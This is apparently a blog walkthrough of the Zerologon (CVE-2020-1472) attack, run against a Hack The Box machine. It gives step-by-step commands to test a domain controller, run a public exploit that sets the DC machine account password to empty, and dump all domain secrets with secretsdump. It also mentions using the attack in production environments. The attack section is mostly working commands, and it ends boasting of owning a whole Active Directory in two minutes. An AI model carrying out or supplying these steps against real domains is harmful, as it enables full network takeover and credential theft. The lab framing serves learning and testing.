The attack described here takes advantage of flaws in a cryptographic authentication protocol that proves the authenticity and identity of a domain-joined computer to the DC. Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain. (Secura)
Firstly, you need the latest version of impacket from here
1 git clone https://github.com/SecureAuthCorp/impacket.git
Then cd into the folder and execute
1 pip3 install .
Testing if a DC is vulnerable
Spoiler, they probably are.
First, clone the following repo and install the requirements
1 git clone https://github.com/SecuraBV/CVE-2020-1472.git
1 2 cd CVE-2020-1472 pip3 install -r requirements.txt
Running the Check Script
Now that we have the testing script installed, we can check a host to see if they are vulnerable, I will be running this against the Multimaster machine from Hack The Box.
The command is as follows:
1 python zerologon_tester.py <DC netbios name> <DC-IP>
Bingo! We can see that the host is vulnerable!
Exploiting a Domain Controller
If you are doing this in a working production environment then you need to make sure you have the hash of the Domain Controller Machine Account as this wil be needed to reset the host after you have exploited it, otherwise it will no longer be able to communicate with other DC’s.
Getting the POC
To get the exploit, clone this git repo and make sure you have impacket installed
1 git clone https://github.com/dirkjanm/CVE-2020-1472.git
Now we can run the exploit against our vulnerable target machine
1 python cve-2020-1472-exploit.py <NETBIOS NAME> <DC-IP>
If all was sucessfull you will get a
Dumping Domain Secrets with secretsdump.py
Now we have set the machine password to an empty string, “”, we can now DCSync with secretsdump.py to get all the domain secrets.
1 secretsdump.py -just-dc -no-pass DCHOSTNAME[email protected]DC-IP
And just like that I’ve owned your whole AD Environment, in less that two minutes.
If you enjoyed the write up or found it useful consider + repping my htb profile linked below: